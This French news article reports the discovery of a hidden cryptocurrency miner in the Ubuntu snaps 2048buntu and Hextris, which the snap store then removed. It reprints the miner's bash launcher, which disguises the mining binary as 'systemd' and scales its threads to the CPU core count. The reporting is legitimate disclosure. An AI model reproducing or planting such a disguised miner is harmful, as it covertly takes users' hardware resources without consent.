En fait il est question de bien faire comprendre que la facilité avec laquelle les snaps peuvent être installés s’accompagne d’un revers. Dans le cas d’espèce, l’utilisateur qui fait usage du pseudonyme tawirdur sur GitHub tire la sonnette d’alarme sur le fait que l’application peut ne pas être saine. À l’heure où les monnaies cryptographiques ont le vent en poupe, des développeurs veulent se faire de l’argent sur le dos des ressources matérielles des utilisateurs de snaps et ce, à leur insu. Tawirdur a détecté que le snap 2048buntu contient un mineur de monnaies cryptographiques.
D’après ce que rapporte le site spécialisé Linux Uprising, l’application Hextris est dans la même situation. Tawirdur a publié une copie du script d’initialisation du mineur de monnaie cryptographique au sein du snap 2048buntu.
Code : | Sélectionner tout |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | #!/bin/bash currency=bcn name=2048buntu { # try /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g } || { # catch cores=($(grep -c ^processor /proc/cpuinfo)) if (( $cores < 4 )); then /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 else /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2 fi } |
Il s’agit d’un problème quand on sait que certains snaps peuvent être publiés sous licence propriétaire pour compliquer la revue du code source à laquelle la communauté se livre de façon traditionnelle. Nicolas Tomb a publié le snap 2048buntu – un jeu développé par l’utilisateur qui fait usage du pseudonyme iirelu sur GitHub – sous licence MIT. La présence d’un mineur de cryptomonnaie en son sein peut donc bien être interprétée comme une intention manifeste de nuire.
L’équipe en charge de la boutique de snaps gère les signalements au fur et à mesure qu’ils sont remontés par les utilisateurs. À date, les snaps 2048buntu et Hextris sont écartés et les investigations se poursuivent.
Sources : linuxuprising, tawirdur, processus de publication d’un snap
Et vous ?
Qu’en pensez-vous ?
S’agit-il d’un incident isolé ? La brèche est-elle utilisée à grande échelle ?
Que faites-vous personnellement pour vous assurer assurer de ce que les snaps que vous décidez d’installer sont sains ?
Voir aussi :
Google Play Store : plus de 250 applications armées à l' « Alphonso », un logiciel qui analyse les contenus TV pour les annonceurs
Apple procède à un nettoyage de son App Store pour se débarrasser des applications affectées par le malware XcodeGhost